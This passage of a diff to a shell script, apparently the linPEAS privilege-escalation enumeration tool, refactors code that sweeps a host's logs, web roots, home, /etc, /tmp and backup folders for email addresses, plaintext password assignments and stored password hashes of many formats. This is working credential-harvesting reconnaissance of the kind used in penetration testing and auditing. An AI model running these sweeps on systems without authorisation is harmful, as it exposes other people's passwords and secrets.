! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then ##-- IF) Emails inside logs print_2title "Searching emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" echo "" fi - - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Searching passwords inside key folders (limit 70) - only PHP files" - if ! [ "$SEARCH_IN_FOLDER" ]; then - intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) - else - intpwdfiles=$(timeout 150 find $SEARCH_IN_FOLDER -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) - fi - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Searching passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - ##-- IF) Find possible files with passwords print_2title "Searching possible password variables inside key folders (limit 140)" if ! [ "$SEARCH_IN_FOLDER" ]; then @@ -4941,712 +5504,231 @@ if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q api_keys_regex; then print_title "API Keys Regex" +search_for_regex(){ + title=$1 + regex=$2 + caseSensitive=$3 + + if [ "$caseSensitive" ]; then + i="i" + else + i="" + fi + + print_3title_no_nl "Searching $title..." + + if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + else + # Search in home direcoties (usually the slowest) + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in etc + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in opt + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in possible web folders (usually only 1 will exist) + timeout 120 find /var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in logs + timeout 120 find /var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in backups + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in others folders (usually only /srv or /Applications will exist) + timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + fi + wait + printf "\033[2K\r" +} + + + if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then - print_2title "Searching Hashed Passwords" -print_3title_no_nl "Searching Apr1 MD5 (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Apache SHA (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Blowfish (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Drupal (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Joomlavbulletin (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Linux MD5 (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching phpbb3 (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching sha512crypt (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Wordpress (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc 